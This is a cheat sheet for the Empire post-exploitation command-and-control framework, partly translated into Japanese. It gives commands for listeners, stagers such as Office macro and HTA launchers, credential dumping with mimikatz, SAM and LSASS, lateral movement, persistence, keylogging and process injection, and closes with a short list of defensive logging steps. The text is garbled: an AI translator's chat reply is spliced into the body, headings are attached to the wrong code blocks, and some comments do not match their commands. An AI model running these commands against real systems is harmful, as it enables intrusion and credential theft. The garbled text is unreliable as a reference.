Empire フレームワーク チートシート
概要
Empire は、純粋な PowerShell 2.0 の Windows エージェントと純粋な Python 3 の Linux/macOS エージェントを含むポストエクスプロイテーションフレームワークです。レッドチーム作戦、ペネトレーションテスト、および敵対者エミュレーションのための強力なコマンド&コントロール(C2)インフラストラクチャを提供します。
⚠️ 警告: Empire はセキュリティテスト用のツールであり、明示的な許可がある環境でのみ使用する必要があります。
Would you like me to continue translating the remaining sections? If so, could you provide the content for sections 3-20, as they are currently blank in your original text?```bash
Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git
Navigate to the directory
cd Empire
Run the installation script
sudo ./setup/install.sh
### Using Docker
```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest
# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latestOn Kali Linux
# Install from package manager
sudo apt update
sudo apt install powershell-empireBasic Usage
Starting Empire
# Start the Empire server
sudo empire
# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>Using Starkiller (GUI)
# Install Starkiller
npm install -g @starkiller/starkiller
# Run Starkiller
starkillerEmpire CLI Navigation
| コマンド | 説明 |
|---|---|
help | ヘルプメニューを表示 |
menu | メインメニューに戻る |
back | 1つ前のメニューレベルに戻る |
exit | Exit Empire |
usemodule <module> | 使用するモジュールを選択 |
usestager <stager> | ステージャーを選択して使用する |
uselistener <listener> | リスナーを選択して使用する |
interact <agent> | エージェントと対話する |
searchmodule <term> | モジュールを検索 |
Listeners
Creating a Listener
# In Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
executeCommon Listener Options
| オプション | 説明 |
|---|---|
Name | リスナーの名前 |
Host | ステージング用のIP/ホスト名 |
Port | リスナー用のポート |
CertPath | HTTPSの証明書パス |
DefaultDelay | エージェントコールバック遅延(秒単位) |
DefaultJitter | エージェントコールバックにおけるジッター (0.0-1.0) |
DefaultProfile | デフォルト通信プロファイル |
KillDate | リスナーが退出する日付 (MM/DD/YYYY) |
WorkingHours | コールバックのエージェント対応時間(09:00-17:00) |
Listener Management
# List all listeners
listeners
# Kill a listener
kill http_listener
# View a listener's options
info http_listenerStagers
Generating a Stager
# In Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generateCommon Stager Types
| ステージャー | 説明 |
|---|---|
windows/launcher_bat | BATファイルランチャー |
windows/launcher_vbs | VBS スクリプトランチャー |
windows/launcher_powershell | PowerShell ランチャー |
multi/launcher | マルチプラットフォーム ランチャー |
osx/launcher | macOS ランチャー |
linux/launcher | Linuxランチャー |
windows/dll | DLLランチャー |
windows/macro | オフィスマクロランチャー |
windows/hta | HTAランチャー |
Agents
Agent Commands
# List all agents
agents
# Interact with an agent
interact C2AGENT123
# Get agent info
info
# Execute a shell command
shell whoami
# Run a PowerShell command
powershell Get-Process
# Upload a file
upload /path/to/local/file /path/on/target
# Download a file
download /path/on/target /local/path
# Take a screenshot
screenshot
# Exit agent menu
backAgent Management
# Rename an agent
rename C2AGENT123 new_name
# Kill an agent
kill C2AGENT123
# Remove an agent from the database
remove C2AGENT123
# Set sleep interval
sleep 30
# Set jitter percentage
sysinfoModules
Using Modules
# List available modules
usemodule
# Search for modules
searchmodule credentials
# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user
# Set module options
set Username administrator
# Execute the module
executeCommon Module Categories
Credential Access
# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords
# Dump SAM database
usemodule powershell/credentials/sam
# Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dumpSituational Awareness
# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user
# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer
# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_groupLateral Movement
# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi
# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec
# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrmPersistence
# Registry persistence
usemodule powershell/persistence/userland/registry
# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks
# WMI persistence
usemodule powershell/persistence/elevated/wmiAdvanced Features
Malleable C2 Profiles
# In Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile
```### OPSEC上の考慮事項Set agent kill date
set KillDate 01/01/2025
Set working hours
set WorkingHours 09:00-17:00
Increase agent sleep time
sleep 300 30
Use keylogging module
usemodule powershell/collection/keylogger
Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor
Use screenshot module
usemodule powershell/collection/screenshot
### 一般的な問題
```bash
# Check if the listener is running
listeners
# Verify firewall settings
sudo iptables -L
# Check for port conflicts
netstat -tuln|grep <port>
```**接続の問題**
```bash
# Verify agent is running
agents
# Check for network connectivity issues
# Verify sleep/jitter settings # Check module requirements
info
# Verify agent privileges
shell whoami
# Try running in a different process context
usemodule powershell/management/psinject
```**エージェントがチェックインしない**
```powershell
# Enable PowerShell Script Block Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Enable PowerShell Module Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"https://github.com/BC-SECURITY/Empire**モジュール実行の失敗 ** https://bc-security.gitbook.io/empire-wiki/
防御対策
検出方法
- PowerShell スクリプトブロックのログ記録
- PowerShell モジュールのログ記録
- AMSI (Antimalware Scan Interface)
- ネットワークトラフィック分析
- 行動分析
予防技術
https://github.com/BC-SECURITY/Starkiller
リソース
- BC Security GitHub
- [Empire Wiki](